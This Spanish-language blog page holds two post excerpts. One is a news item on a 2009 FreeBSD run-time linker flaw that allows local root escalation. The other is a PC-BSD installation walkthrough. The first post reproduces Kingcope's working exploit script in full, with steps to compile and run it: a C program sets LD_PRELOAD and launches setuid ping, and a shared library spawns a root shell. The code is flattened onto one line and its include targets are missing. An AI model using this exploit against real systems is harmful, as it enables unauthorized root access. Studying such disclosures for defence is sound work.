Fallo en FreeBSD permite obtener root

Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo. El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid. VERSIONES DE FREEBSD AFECTADAS ********************************** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NO VULNERABLE FreeBSD 4.9-RELEASE *** NO VULNERABLE Para más detalles ver el exploit. #!/bin/sh echo ** FreeBSD local r00t zeroday echo by Kingcope echo November 2009 cat > env.c << _EOF #include main() { extern char **environ; environ = (char**)malloc(8096); environ[0] = (char*)malloc(1024); environ[1] = (char*)malloc(1024); strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); execl("/sbin/ping", "ping", 0); } _EOF gcc env.c -o env cat > program.c << _EOF #include #include #include #include void _init() { extern char **environ; environ=NULL; system("echo ALEX-ALEX;/bin/sh"); } _EOF Para compilar y ejecutar gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles cp w00t.so.1.0 /tmp/w00t.so.1.0 ./env Mas Información en el Full Disclosure publicado por Nikolaos...

Leer Más

PC-BSD, nunca fue tan sencillo instalar y operar un BSD

PC-BSD es un Sistema Operativo encaminado a los escritorios y basado en FreeBSD, igual a DesktopBSD. Es de fácil uso con instalación gráfica gracias a un programa que instala y configura automáticamente un escritorio con KDE por defecto. En Agosto del 2006 fue denominado el Sistema Operativo más amigable según OSWeekly.com. PC-BSD ofrece un nuevo y llamativo sistema de utilización de paquetes, se diferencia de la tonica seguida por los Sistemas Unix. En vez de utilizar los puertos FreeBSD o el sistema de paquetes usa archivos con la extensión .pbi extensión de archivo el cual podría definirse como instaladores de un sólo click. Todo el sistema de paquetes y librerías esta contenido en un sólo archivo, instalado por el mismo en un mismo directorio raíz /Programs, haciendo más fácil la búsqueda de los binarios de los programas y reduciendo la posibilidad de paquetes rotos si las librerías cambian o son actualizadas. Paso a paso de instalación de PC-BSD Después de descargar y grabar la imágen ISO del sistema PC-BSD, seguiremos los pasos que describimos a continuación: Iniciamos el PC desde la unidad de CD/DVD (o imágen ISO del S.O), veremos entonces la siguiente pantalla Booteo en ejecución Seleccionamos idioma del sistema, teclado y zona horaria Para mi caso, seleccioné lo que se muestra a continuación Damos clic en siguiente Aceptamos los acuerdos de licencia Tipo de instalación. En este caso “instalación limpia” (desde cero) Asignamos una contraseña para el usuario root (administrador), además creamos los respectivos usuarios que consideremos necesarios (para este manual, bastará con un solo usuario) Seleccionamos a continuación el disco dispuesto para efectuar la instalación Componentes adicionales disponibles en el proceso de instalación (FireFox, Open Office.org, Ports Tree, Games, etc.) Comenzamos entonces con la instalación Proceso de instalación en ejecución Instalación terminada. Ahora se nos pedirá reiniciar la máquina. Vamos a ello. Configuración inicial de pantalla Pantalla de inicio de sesión Cargando dispositivos, programas y configuración Interfaz gráfica inicial de PC-BSD Probando conctividad en la navegación Web Un poco corto, pero productivo el “paso a paso con PC-BSD”. Recuerda que tenemos un foro destinado a cubrir diferentes aspectos de este Sistema Operativo. Más información Web oficial de PC-BSD Descargar...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES